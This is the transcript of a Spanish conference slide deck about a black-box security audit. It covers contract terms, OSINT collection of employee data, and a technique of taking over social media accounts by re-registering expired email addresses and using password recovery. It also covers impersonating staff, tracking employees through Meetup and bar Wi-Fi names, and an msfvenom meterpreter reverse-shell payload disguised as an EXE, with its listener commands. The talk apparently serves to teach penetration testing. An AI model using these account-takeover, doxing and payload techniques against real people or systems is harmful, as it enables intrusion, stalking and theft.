Auditoría informática de seguridad de caja negra en el sur
-
Upload
quantika14 -
Category
Internet
-
view
507 -
download
0
Transcript of Auditoría informática de seguridad de caja negra en el sur
¿Quién soy yo?
24/1/2016 WWW.QUANTIKA14.COM 2
•Fundador de empresas de seguridad informática QuantiKa14.•Fundador de EXO Security, localización de personas.•Dueño del bar K’talo en la calle niebla 25, Sevilla.•Fundador y miembro del proyecto WordPressA.•Creador del proyecto Triana Browser.•Autor del blog www.botentriana.wordpress.com•Especialista en bots y BigData.
Seguridad en el sur…
•Sevilla: 1.100 •Cádiz: 393•Huelva: 161•Córdoba: 313•Málaga: 972•Jaén: 190•Almería: 269
Datos de BigData QuantiKa14.
24/1/2016 WWW.QUANTIKA14.COM 3
Seguridad en el sur…
0
0,5
1
1,5
2
2,5
3
3,5
4
4,5
5
2012 2013 2014 2015
Creación de empresas Seguridad Informática
Andalucia Madrid Barcelona
•Aumento del crecimiento en Andalucía.•Constante crecimiento en Madrid y Barcelona.
24/1/2016 WWW.QUANTIKA14.COM 4
Procesos…
•Firma de contrato.•Objetivos.•Recogida de datos (footprinting & fingerprinting)•Análisis de vulnerabilidades.•Explotación.•Informe.
24/1/2016 WWW.QUANTIKA14.COM 5
Firma de contrato
•Empleados y directivos deben firmar un contrato.•Proveedores, colaboradores y asociados firman o son avisados.•Firma de contrato de confidencialidad y secreto.•Notificación previa de acciones que pueden perjudicar gravemente a la empresa.•Formas y métodos de pago.
24/1/2016 WWW.QUANTIKA14.COM 6
Formas y métodos de pagos
•50 % en la firma del contrato.•25% a los 20 días de la firma del contrato.•25% en la entrega del informe.
24/1/2016 WWW.QUANTIKA14.COM 7
OBJETIVOS
•Simular un ataque informático de caja negra.•Hacerlo en 40 días máximo.•Informar de posibles fugas de información o de accesos no autorizados.
24/1/2016 WWW.QUANTIKA14.COM 8
MECH3RO PACK
•Pack de scripts creados por Jorge Websec para la recogida de datos. BOTENTRIANA.WORDPRESS.COM•Python 2.7.9•Librerías: mechanize y beautifulSoup.
24/1/2016 WWW.QUANTIKA14.COM 11
Listado de empleados
•Listado de trabajadores en la empresa usando M3chero.•Buscadores.•Prensa.•Harvesting email con email collector Metasploit.•LinkedIn.
24/1/2016 WWW.QUANTIKA14.COM 13
ASOCIACIÓN DE SEGURIDAD PRIVADA
Identificamos las asociaciones.Eventos.Páginas webs.
Obtenemos listado de empleados del departamento de seguridad.El objetivo es obtener el
listado de empleados.
La técnica de los 3 años
•Una cuenta de Hotmail, Outlook, Gmail, Yahoo, etc… duran 3 años hasta ser borrados por inactividad.•¿La cuenta de tu infancia es la misma que usas para las redes sociales?
24/1/2016 WWW.QUANTIKA14.COM 15
MECH3RO II : validar cuenta de email
•Dentro de Mech3ro Pack encontraremos “email_validator.py”para validar cuentas email masivamente.
24/1/2016 WWW.QUANTIKA14.COM 16
Mech3ro III: validar cuentas de Twitter y FB
•Las cuentas de la lista que no existan por tiempo inactivo o porque el usuario los haya borrado, creamos una nueva lista diferente.•La nueva lista la usará “validator_twitter_fbyTwt.py” para asociar unacuenta de correo a una cuenta de Facebook y Twitter.•Las que den positivas en las cuentas de RRSS solo hará falta crear de nuevo la cuenta y darle a recordar contraseña.
24/1/2016 WWW.QUANTIKA14.COM 17
PROCESOS
24/1/2016 WWW.QUANTIKA14.COM 18
LISTA DE EMAILS
¿EXISTE? SINo
ASOCIADO ALGUNA CUENTA
Si
No
CREAR CORREO
RECUPERAR CONTRASEÑA
OBJETIVO CUMPLIDO
• Conseguimos acceso a varias cuentas de Facebook y Twitter.
• Haciéndonos pasar por uno de los empleados de seguridad le pedimos a otro que hemos
perdido el listado y nos lo manda.
¿Localizar a empleados?
•El uso de Internet siempre deja rastros de tu actividad en la vida real.•Sabiendo usar los datos que se exponen en las diferentes plataformas podemos saber donde te mueves.
24/1/2016 WWW.QUANTIKA14.COM 20
Doxing: investigar, analizar, recopilar información de una persona en Internet. Asociar una identidad virtual a una física.
MECH3RO IV: Meetup
24/1/2016 WWW.QUANTIKA14.COM 21
Bot de MeetupACCEDE A MEETUP
http://www.meetup.com/es-ES/find/events/?allMeetups=true&radius=62&userFreeform=Sevilla
Bot de Meetup 2
ACCEDE A CADA EVENTO
MECH3RO V: CRUZAR DATOS I
24/1/2016 WWW.QUANTIKA14.COM 22
Usuarios que van a evento de MeetUp
Diego Martínez
Ricardo Gonzalez
Juan Jiménez
Un poquito de Ingeniería social…
•Sabíamos los eventos próximosque visitarían.•Sabiendo sus redes socialessabíamos sus gustos, publicaciones y comentarios.•Sabíamos que la empresa habíaimplementado un sistema de acceso hace poco por unasubvención. ¿Biometría?
24/1/2016 WWW.QUANTIKA14.COM 23
¿Qué averiguamos?
•Existe un sistema de acceso a diferentes salas.•Una empleada guarda claves de accesos a diferentes salas en un txt en su ordenador. [¿Quién?]•Los empleados suelen frecuentar diferentes bares de la zona donde se encuentra el edificio de la empresa. [Podemos identificar según los clientes Wifi]
24/1/2016 WWW.QUANTIKA14.COM 24
Bares de la zona…
•Café de Indias -> Wifi muy genérico ESSID:“CAFÉ-INDIAS-WIFI”.•Mac Donald -> Demasiado genérico.•Bar “el eructo feliz” -> ESSID:”ERUCTOFELIZ-WIFI”.
24/1/2016 WWW.QUANTIKA14.COM 25
De esta forma podíamos identificar en que eventos se encuentran
empleados de la empresa.
Creamos payload II
•# msfvenom -p windows/meterpreter/reverse_tcp -b ‘\x00’ LHOST=192.168.1.10 LPORT=4444 -x /home/root/Escritorio/FAKE.exe -f exe > bicho.exe
•-b: evitar caracteres vacíos o malos.•-x: plantilla•-i: interacciones del encoder•-e: encoder -> x86/shikata_ga_nai
24/1/2016 WWW.QUANTIKA14.COM 29
msf> use multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST <IP_Escucha> (por ejemplo set LHOST 192.168.5.55)msf exploit(handler) > set LPORT <Puerto Escucha> (por ejemplo set LPORT 4444)msf exploit(handler) > exploit[*] Started reverse handler on 192.168.75.35:4444[*] Starting the payload handler…
Escuchamos
24/1/2016 WWW.QUANTIKA14.COM 32
Pivoting: Mapa de red
Desde las máquinas infectadas hacemos un escáner de la red.
Con el correo que le enviamos…
Registramos el USER-AGENT y la IP Local.http://net.ipcalf.com/